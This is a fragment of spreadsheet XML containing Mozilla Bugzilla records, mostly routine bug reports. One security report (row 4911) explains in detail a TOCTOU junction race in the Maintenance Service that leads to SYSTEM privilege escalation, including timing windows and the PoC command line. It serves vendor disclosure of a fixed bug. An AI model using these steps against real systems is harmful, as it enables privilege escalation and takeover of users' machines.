      <c r="O4906" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4906" t="inlineStr"/>
      <c r="Q4906" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4906" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S4906" t="inlineStr">
        <is>
          <t>mozilla0.8</t>
        </is>
      </c>
      <c r="T4906" t="n">
        <v>1</v>
      </c>
      <c r="U4906" t="n">
        <v>0</v>
      </c>
      <c r="V4906" t="n">
        <v>76</v>
      </c>
      <c r="W4906" t="inlineStr">
        <is>
          <t>Mac branch build 2000101608
Plugins : shockwave flash 5.0 (comes with installation)
Macromedia shockwave player ABSENT
Steps to recreate problem :
1 Go to hgttp://www.shockwave.com
2 It should take you to the download url mentioned above
3 Go thru the installation steps
4 Launch browser (it shud launch automatically after install)
5 Type "about:plugins" in the url bar
6 Check to see Shockwave player 8.0 and Flash 5.0 listed( which they shud)
7 Now go to http://www.shockwave.com and click on 'Games'-&gt; 'Arcade 
  Action'-&gt;'Delirium'
8 Observe that the bottom tab of the game appears but the area where the 
  shockwave game should appear, appears blank.
9 Out of 4 machines, only once did a shockwave update dialog pop up and on 
  clicking on it, the browser crashed. Attached below is the stack trace.
10 On 4.x, the update dialog pops up and proceeds with the update and loads the   
game fine.
11 Now this also starts working on 6.0(shockwave content loads and works great). 
So unless the update is done (using 4.x), shockwave does not work.
Bug 35915 was the one filed for shockwave install, so am assigning this to 
pchen. Pls reassign if you think it's not yours. Thx.</t>
        </is>
      </c>
      <c r="X4906" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4907">
      <c r="A4907" t="n">
        <v>1264300</v>
      </c>
      <c r="B4907" t="inlineStr">
        <is>
          <t>2016-04-13 07:40:18 -0700</t>
        </is>
      </c>
      <c r="C4907" t="inlineStr">
        <is>
          <t>Rooting hazard with Maybe&lt;AutoClearTypeInferenceStateOnOOM&gt; in ObjectGroup::sweep</t>
        </is>
      </c>
      <c r="D4907" t="inlineStr">
        <is>
          <t>2018-02-28 10:32:14 -0800</t>
        </is>
      </c>
      <c r="E4907" t="n">
        <v>1</v>
      </c>
      <c r="F4907" t="n">
        <v>1</v>
      </c>
      <c r="G4907" t="n">
        <v>3</v>
      </c>
      <c r="H4907" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4907" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4907" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4907" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4907" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4907" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4907" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4907" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4907" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main47+]</t>
        </is>
      </c>
      <c r="Q4907" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4907" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4907" t="inlineStr">
        <is>
          <t>mozilla49</t>
        </is>
      </c>
      <c r="T4907" t="n">
        <v>1</v>
      </c>
      <c r="U4907" t="n">
        <v>0</v>
      </c>
      <c r="V4907" t="n">
        <v>52</v>
      </c>
      <c r="W4907" t="inlineStr">
        <is>
          <t>decoder found a hard-to-reduce OOM crash. I think what's happening is that ObjectGroup::sweep does:
  Maybe&lt;AutoClearTypeInferenceStateOnOOM&gt; fallbackOOM;
The rooting analysis doesn't know the destructor of this thing can GC, so various callers can call this with unrooted pointers on the stack.</t>
        </is>
      </c>
      <c r="X4907" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4908">
      <c r="A4908" t="n">
        <v>181440</v>
      </c>
      <c r="B4908" t="inlineStr">
        <is>
          <t>2002-11-22 03:47:17 -0800</t>
        </is>
      </c>
      <c r="C4908" t="inlineStr">
        <is>
          <t>ubs.com - E-Banking broken because of regression in processing forms (no action attribute)</t>
        </is>
      </c>
      <c r="D4908" t="inlineStr">
        <is>
          <t>2015-04-19 23:45:39 -0700</t>
        </is>
      </c>
      <c r="E4908" t="n">
        <v>1</v>
      </c>
      <c r="F4908" t="n">
        <v>1</v>
      </c>
      <c r="G4908" t="n">
        <v>6</v>
      </c>
      <c r="H4908" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4908" t="inlineStr">
        <is>
          <t>Tech Evangelism Graveyard</t>
        </is>
      </c>
      <c r="J4908" t="inlineStr">
        <is>
          <t>German</t>
        </is>
      </c>
      <c r="K4908" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4908" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4908" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4908" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4908" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4908" t="inlineStr"/>
      <c r="Q4908" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4908" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4908" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4908" t="n">
        <v>1</v>
      </c>
      <c r="U4908" t="n">
        <v>0</v>
      </c>
      <c r="V4908" t="n">
        <v>132</v>
      </c>
      <c r="W4908" t="inlineStr">
        <is>
          <t>This bug is happening with the nightly of 2002-11-13-21 on Linux. I didn't try
it on other recent builds, nor on other platforms. But it works with Mozilla
1.1. That's why I'm marking this as a regression, and it's critical because it
completely breaks the UBS e-banking service.
Steps to reproduce
1. Load the URL http://www.ubs.com/g/ebanking/classic/demo.html (this is a demo
   account which allows you to test their system - and for our case, to find out
   where the bug exactly happens.
2. Click the button "Start the UBS e-Banking Demo"
   =&gt; you get a page in German. If you want to switch to English, proceed with
      the next steps, otherwise, skip to step ...
3. Click on "Sprache" in the top navigation
4. Select English or your preferred language
5. On the left hand navigation, select "Payments"
6. On the modified left hand navigation, select "Orange/Blue payment slip"
7. In the right frame, you get a list of accounts. Select any one of them which
   doesn't have a negative balance. For example:
    230 638.917.02X    DEMO E-BANKING     TOBROSA AG     CHF    20'697.83
8. Now you get an orange payment slip in the right frame. Fill in the following
   fields with these values:
   Account: 01-10923-9
   Amount: 100
   Reference No.: 1100777
9. Click on verify
Result:
You get the list of the accounts again
Expected result
You should get the same payment slip, but without fields. The text you typed in,
should be formatted in the following manner:
   Account: 01-010923-9  (a leading 0 in the middle number)
   Amount: 100.00        (.00 appended)
   Reference No.: 00 00000 00000 00000 00011 00777
              (a lot of leading 0's and a space every 5 digits from the right)
At the bottom of the payment slip, you should have a "Submit" button, and when
clicking on it, you should get a confirmation screen, saying:
"Your order has been successfully received. It will be executed on (date),
provided sufficient credit is available and the order was transmitted within the
UBS acceptance deadline."
I will attach an image showing the form as it should be filled in, and then on
the left hand of the image the expected results, on the right hand, the buggy
results.</t>
        </is>
      </c>
      <c r="X4908" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4909">
      <c r="A4909" t="n">
        <v>347966</v>
      </c>
      <c r="B4909" t="inlineStr">
        <is>
          <t>2006-08-08 19:05:01 -0700</t>
        </is>
      </c>
      <c r="C4909" t="inlineStr">
        <is>
          <t>Need jprof profile data to be exported by (some) Tinderbox performance tests</t>
        </is>
      </c>
      <c r="D4909" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E4909" t="n">
        <v>1</v>
      </c>
      <c r="F4909" t="n">
        <v>1</v>
      </c>
      <c r="G4909" t="n">
        <v>5</v>
      </c>
      <c r="H4909" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4909" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4909" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4909" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4909" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4909" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4909" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4909" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4909" t="inlineStr"/>
      <c r="Q4909" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4909" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4909" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4909" t="n">
        <v>1</v>
      </c>
      <c r="U4909" t="n">
        <v>0</v>
      </c>
      <c r="V4909" t="n">
        <v>48</v>
      </c>
      <c r="W4909" t="inlineStr">
        <is>
          <t>It can sometimes be hard to reproduce performance issues reported by Tinderbox test machines. It would help a lot if some performance test machines ran with profiling on and published their profiles.
jprof:
http://www.mozilla.org/performance/jprof.html
http://lxr.mozilla.org/mozilla/source/tools/jprof/README.html
It works only on Linux x86, as far as I know.</t>
        </is>
      </c>
      <c r="X4909" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4910">
      <c r="A4910" t="n">
        <v>814552</v>
      </c>
      <c r="B4910" t="inlineStr">
        <is>
          <t>2012-11-22 19:00:42 -0800</t>
        </is>
      </c>
      <c r="C4910" t="inlineStr">
        <is>
          <t>IonMonkey: Assertion failure: masm.framePushed() == frameSize(), at ion/CodeGenerator.cpp:342 or Crash [@ MarkInternal&lt;js::ion::IonCode&gt;]</t>
        </is>
      </c>
      <c r="D4910" t="inlineStr">
        <is>
          <t>2013-11-25 16:40:43 -0800</t>
        </is>
      </c>
      <c r="E4910" t="n">
        <v>1</v>
      </c>
      <c r="F4910" t="n">
        <v>1</v>
      </c>
      <c r="G4910" t="n">
        <v>3</v>
      </c>
      <c r="H4910" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4910" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4910" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4910" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4910" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M4910" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4910" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4910" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4910" t="inlineStr">
        <is>
          <t>[jsbugmon:ignore][fuzzblocker][adv-main21+]</t>
        </is>
      </c>
      <c r="Q4910" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4910" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4910" t="inlineStr">
        <is>
          <t>mozilla23</t>
        </is>
      </c>
      <c r="T4910" t="n">
        <v>1</v>
      </c>
      <c r="U4910" t="n">
        <v>0</v>
      </c>
      <c r="V4910" t="n">
        <v>26</v>
      </c>
      <c r="W4910" t="inlineStr">
        <is>
          <t>Created attachment 684561
Testcase for shell
The attached testcase asserts on mozilla-central revision bc69705c162d (run with --ion-eager).</t>
        </is>
      </c>
      <c r="X4910" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4911">
      <c r="A4911" t="n">
        <v>1732435</v>
      </c>
      <c r="B4911" t="inlineStr">
        <is>
          <t>2021-09-24 02:01:45 -0700</t>
        </is>
      </c>
      <c r="C4911" t="inlineStr">
        <is>
          <t>Arbitrary permissions overwrite due to folder locking TOCTOU in Maintenance Service</t>
        </is>
      </c>
      <c r="D4911" t="inlineStr">
        <is>
          <t>2024-05-30 10:36:44 -0700</t>
        </is>
      </c>
      <c r="E4911" t="n">
        <v>1</v>
      </c>
      <c r="F4911" t="n">
        <v>1</v>
      </c>
      <c r="G4911" t="n">
        <v>3</v>
      </c>
      <c r="H4911" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4911" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J4911" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K4911" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4911" t="inlineStr">
        <is>
          <t>Desktop</t>
        </is>
      </c>
      <c r="M4911" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N4911" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4911" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4911" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][fidedi-security][sec-survey][post-critsmash-triage][adv-main97+][adv-esr91.6+]</t>
        </is>
      </c>
      <c r="Q4911" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4911" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S4911" t="inlineStr">
        <is>
          <t>97 Branch</t>
        </is>
      </c>
      <c r="T4911" t="n">
        <v>1</v>
      </c>
      <c r="U4911" t="n">
        <v>0</v>
      </c>
      <c r="V4911" t="n">
        <v>36</v>
      </c>
      <c r="W4911" t="inlineStr">
        <is>
          <t>Created attachment 9242817
poc.zip
There is a time of check to time of use bug in the way the fix-update-directory-perms functionality of the maintenance service locks folders that allows an attacker to swap out a subfolder with a junction. The files in the junction target will then have 'All Permissions' for the 'Users' group added to them. This effectively allows privilege escalation to SYSTEM, eg. by targeting the Mozilla Maintenance Service installation directory and replacing the maintenanceservice.exe binary with a malicious one.
The TOCTOU is in the commonupdatedir.cpp:Lock() function [0]. There is a brief window between the initial call to GetFileAttributesW() on line 413 to when the directory is locked with the mozlock file on line 435 and then again to when the attributes are updated on line 448.
During this time, the directory referenced in path can be replaced with a directory junction to a temporary directory. When this happens, the mozlock file is created in the temporary directory target, which doesn't lock access to original path. The junction can then be removed and replaced with a normal folder before the second call to GetFileAttributesW() so the class records attributes for a standard folder.
It needs to be left as a normal folder throughout the filesystem link checks in the Reset() function (line 508) and up until after the call to file.PermsOK() in EnsureCorrectPermissions() (line 1486) to avoid the directory being moved out of the way. After this point, it can be replaced with a junction to the actual target directory which the maintenance service will recurse into (line 1528) and update the permissions of all files contained.
The fact the mAttributes property is only updated/checked at lock time means once it's poisoned we don't have to worry about it.
The timing is very tight, but I've confirmed it's possible with a proof of concept (attached). I did have to run Prime95 to generate some load at the same time and I manually changed it's priority to Above Normal - the idea being that the maintenance service runs at Normal priority and the POC runs at High priority so the load should only slow down the maintenance service.
I had success with 0ms delay for stage 1, 181ms delay for stage 2 and 11ms delay for stage 3. The only mandatory parameter the POC takes is the target directory to overwrite the permissions on, but will also take lower/upper bounds for the delays on the three race "stages". The following command line worked on my system after around 20 minutes:
.\FirefoxPoc.exe 'C:\\Program Files (x86)\\Mozilla Maintenance Service\\' 0 100 150 250 0 50
Where 0 100 means stage 1 will start at a delay of 0ms and keep trying up until 100ms, 150 250 is stage 2 starting at 150ms up to 250ms and stage 3 starting at 0ms up to 50ms. If that yields no results after running a few times, you can just run the command line without the timing hints and it will try to work it out itself - that took me a good five or so hours though. Eg.
.\FirefoxPoc.exe 'C:\\Program Files (x86)\\Mozilla Maintenance Service\\'
Please let me know if you need more information
[0] - https://hg.mozilla.org/mozilla-central/file/00858d05a9e2685dac987d90866f201989def64d/toolkit/mozapps/update/common/commonupdatedir.cpp#l412</t>
        </is>
      </c>
      <c r="X4911" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4912">
      <c r="A4912" t="n">
        <v>907727</v>
      </c>
      <c r="B4912" t="inlineStr">
        <is>
          <t>2013-08-21 06:56:13 -0700</t>
        </is>
      </c>
      <c r="C4912" t="inlineStr">
        <is>
          <t>Accessor user-defined properties on DOM proxies get the wrong "this" object: the expando object</t>
        </is>
      </c>
      <c r="D4912" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E4912" t="n">
        <v>1</v>
      </c>
      <c r="F4912" t="n">
        <v>1</v>
      </c>
      <c r="G4912" t="n">
        <v>3</v>
      </c>
      <c r="H4912" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4912" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4912" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K4912" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4912" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4912" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4912" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4912" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4912" t="inlineStr">
        <is>
          <t>[still needs a test checked in][adv-main24+][adv-esr1709+]</t>
        </is>
      </c>
      <c r="Q4912" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4912" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4912" t="inlineStr">
        <is>
          <t>mozilla26</t>
        </is>
      </c>
      <c r="T4912" t="n">
        <v>1</v>
      </c>
      <c r="U4912" t="n">
        <v>0</v>
      </c>
      <c r="V4912" t="n">
        <v>20</v>
      </c>
      <c r="W4912" t="inlineStr">
        <is>
          <t>Created attachment 793481
Testcase
If you load the attached testcase, you get an exception when you should get the HTMLOptionElement.  The reason is this callstack:
#11 0x000000010187efd1 in JS_GetPropertyById (cx=0x115e0f640, objArg=0x116190220, idArg={asBits = 4643216832}, vp={&lt;js::MutableHandleBase&lt;JS::Value&gt;&gt; = {&lt;js::MutableValueOperations&lt;JS::MutableHandle&lt;JS::Value&gt; &gt;&gt; = {&lt;js::UnbarrieredMutableValueOperations&lt;JS::MutableHandle&lt;JS::Value&gt; &gt;&gt; = {&lt;js::ValueOperations&lt;JS::MutableHandle&lt;JS::Value&gt; &gt;&gt; = {&lt;No data fields&gt;}, &lt;No data fields&gt;}, &lt;No data fields&gt;}, &lt;No data fields&gt;}, ptr = 0x10f9440b8}) at jsapi.cpp:3753
#12 0x0000000106394b20 in mozilla::dom::HTMLSelectElementBinding::DOMProxyHandler::get (this=0x1093d1b40, cx=0x115e0f640, proxy={&lt;js::HandleBase&lt;JSObject *&gt;&gt; = {&lt;No data fields&gt;}, ptr = 0x7fff5fbf9440}, receiver={&lt;js::HandleBase&lt;JSObject *&gt;&gt; = {&lt;No data fields&gt;}, ptr = 0x7fff5fbf9440}, id={&lt;js::HandleBase&lt;jsid&gt;&gt; = {&lt;No data fields&gt;}, ptr = 0x7fff5fbf9470}, vp={&lt;js::MutableHandleBase&lt;JS::Value&gt;&gt; = {&lt;js::MutableValueOperations&lt;JS::MutableHandle&lt;JS::Value&gt; &gt;&gt; = {&lt;js::UnbarrieredMutableValueOperations&lt;JS::MutableHandle&lt;JS::Value&gt; &gt;&gt; = {&lt;js::ValueOperations&lt;JS::MutableHandle&lt;JS::Value&gt; &gt;&gt; = {&lt;No data fields&gt;}, &lt;No data fields&gt;}, &lt;No data fields&gt;}, &lt;No data fields&gt;}, ptr = 0x10f9440b8}) at HTMLSelectElementBinding.cpp:1313
#13 0x0000000101a12889 in js::Proxy::get (cx=0x115e0f640, proxy={&lt;js::HandleBase&lt;JSObject *&gt;&gt; = {&lt;No data fields&gt;}, ptr = 0x7fff5fbf9440}, receiver={&lt;js::HandleBase&lt;JSObject *&gt;&gt; = {&lt;No data fields&gt;}, ptr = 0x7fff5fbf9440}, id={&lt;js::HandleBase&lt;jsid&gt;&gt; = {&lt;No data fields&gt;}, ptr = 0x7fff5fbf9470}, vp={&lt;js::MutableHandleBase&lt;JS::Value&gt;&gt; = {&lt;js::MutableValueOperations&lt;JS::MutableHandle&lt;JS::Value&gt; &gt;&gt; = {&lt;js::UnbarrieredMutableValueOperations&lt;JS::MutableHandle&lt;JS::Value&gt; &gt;&gt; = {&lt;js::ValueOperations&lt;JS::MutableHandle&lt;JS::Value&gt; &gt;&gt; = {&lt;No data fields&gt;}, &lt;No data fields&gt;}, &lt;No data fields&gt;}, &lt;No data fields&gt;}, ptr = 0x10f9440b8}) at jsproxy.cpp:2487
and now we're doing the get on the expando object, and that's what the getter will see.
This is bad, because if you just use a scripted getter you get the expando object as "this"!  Going to mark as security-sensitive for that reason....</t>
        </is>
      </c>
      <c r="X4912" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4913">
      <c r="A4913" t="n">
        <v>912428</v>
      </c>
      <c r="B4913" t="inlineStr">
        <is>
          <t>2013-09-04 02:59:14 -0700</t>
        </is>
      </c>
      <c r="C4913" t="inlineStr">
        <is>
          <t>buildapi/scripts/reporter.py hangs generating builds-4hr.js.gz, resulting in tbpl.m.o not showing completed builds</t>
        </is>
      </c>
      <c r="D4913" t="inlineStr">
        <is>
          <t>2020-01-10 08:23:56 -0800</t>
        </is>
      </c>
      <c r="E4913" t="n">
        <v>1</v>
      </c>
      <c r="F4913" t="n">
        <v>1</v>
      </c>
      <c r="G4913" t="n">
        <v>6</v>
      </c>
      <c r="H4913" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4913" t="inlineStr">
        <is>
          <t>Infrastructure &amp; Operations Graveyard</t>
        </is>
      </c>
      <c r="J4913" t="inlineStr">
        <is>
          <t>CIDuty</t>
        </is>
      </c>
      <c r="K4913" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4913" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4913" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4913" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4913" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4913" t="inlineStr"/>
      <c r="Q4913" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4913" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S4913" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4913" t="n">
        <v>1</v>
      </c>
      <c r="U4913" t="n">
        <v>0</v>
      </c>
      <c r="V4913" t="n">
        <v>6</v>
      </c>
      <c r="W4913" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #905554 +++
Completed builds are not showing up on TBPL, due to builds-4hr.js.gz having last been updated just over an hour ago. See timestamps at:
https://secure.pub.build.mozilla.org/builddata/buildjson/
Guessing the redis service needs a kick again, similar to bug 905554.
Trees are closed (shortly) as a result.</t>
        </is>
      </c>
      <c r="X4913" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4914">
      <c r="A4914" t="n">
        <v>1343491</v>
      </c>
      <c r="B4914" t="inlineStr">
        <is>
          <t>2017-03-01 02:40:07 -0800</t>
        </is>
      </c>
      <c r="C4914" t="inlineStr">
        <is>
          <t>[Regression] Tabs animation gets stuck when closing tabs via hardware keyboard</t>
        </is>
      </c>
      <c r="D4914" t="inlineStr">
        <is>
          <t>2017-03-10 02:41:17 -0800</t>
        </is>
      </c>
      <c r="E4914" t="n">
        <v>1</v>
      </c>
      <c r="F4914" t="n">
        <v>1</v>
      </c>
      <c r="G4914" t="n">
        <v>2</v>
      </c>
      <c r="H4914" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4914" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J4914" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4914" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4914" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M4914" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N4914" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4914" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4914" t="inlineStr">
        <is>
          <t>[MobileCore]</t>
        </is>
      </c>
      <c r="Q4914" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4914" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4914" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4914" t="n">
        <v>1</v>
      </c>
      <c r="U4914" t="n">
        <v>0</v>
      </c>
      <c r="V4914" t="n">
        <v>5</v>
      </c>
      <c r="W4914" t="inlineStr">
        <is>
          <t>Build: d66101cc
Device: iPad Air 2
iOS: 10.2
Steps to reproduce:
1. Open 10 tabs
2. Press cmd+W to close tabs
Actual results:
- Sometimes the tabs animation of the closed tab gets stuck when performing the close tab action more rapidly. 
See video of the issue: https://www.youtube.com/watch?v=XBoZxitiwcA</t>
        </is>
      </c>
      <c r="X4914" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4915">
      <c r="A4915" t="n">
        <v>425133</v>
      </c>
      <c r="B4915" t="inlineStr">
        <is>
          <t>2008-03-25 21:15:37 -0700</t>
        </is>
      </c>
      <c r="C4915" t="inlineStr">
        <is>
          <t>Add cache headers to all locale redirects</t>
        </is>
      </c>
      <c r="D4915" t="inlineStr">
        <is>
          <t>2013-11-08 09:00:20 -0800</t>
        </is>
      </c>
      <c r="E4915" t="n">
        <v>1</v>
      </c>
      <c r="F4915" t="n">
        <v>1</v>
      </c>
      <c r="G4915" t="n">
        <v>5</v>
      </c>
      <c r="H4915" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4915" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J4915" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K4915" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4915" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4915" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4915" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4915" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4915" t="inlineStr">
        <is>
          <t>sumo_only</t>
        </is>
      </c>
      <c r="Q4915" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4915" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4915" t="inlineStr">
        <is>
          <t>0.6</t>
        </is>
      </c>
      <c r="T4915" t="n">
        <v>1</v>
      </c>
      <c r="U4915" t="n">
        <v>0</v>
      </c>
      <c r="V4915" t="n">
        <v>11</v>
      </c>
      <c r="W4915" t="inlineStr">
        <is>
          <t>Caching is done by URL and we should cache these redirects since we are not using accept-lang.  Pre-processing handled by SUMO is not caching main redirects, causing in-product links to bypass the cache.
tiki-setup.php is likely the culprit here.
Temp fix in place is to redirect people manually to the front page until we can insert the correct cache headers:
RewriteCond %{HTTP:Accept-Language} en-us [NC]
RewriteRule ^/$ /en-US/kb/Firefox+Support+Home+Page [NE,R]</t>
        </is>
      </c>
      <c r="X4915" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4916">
      <c r="A4916" t="n">
        <v>1459206</v>
      </c>
      <c r="B4916" t="inlineStr">
        <is>
          <t>2018-05-04 07:30:14 -0700</t>
        </is>
      </c>
      <c r="C4916" t="inlineStr">
        <is>
          <t>Arbitrary file listing (content disclosure?) by compromised content process</t>
        </is>
      </c>
      <c r="D4916" t="inlineStr">
        <is>
          <t>2021-12-03 10:56:03 -0800</t>
        </is>
      </c>
      <c r="E4916" t="n">
        <v>1</v>
      </c>
      <c r="F4916" t="n">
        <v>1</v>
      </c>
      <c r="G4916" t="n">
        <v>3</v>
      </c>
      <c r="H4916" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4916" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4916" t="inlineStr">
        <is>
          <t>DOM: Content Processes</t>
        </is>
      </c>
      <c r="K4916" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4916" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4916" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4916" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4916" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4916" t="inlineStr">
        <is>
          <t>[adv-main61+][adv-esr52.9+][adv-esr60.1+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q4916" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4916" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4916" t="inlineStr">
        <is>
          <t>mozilla62</t>
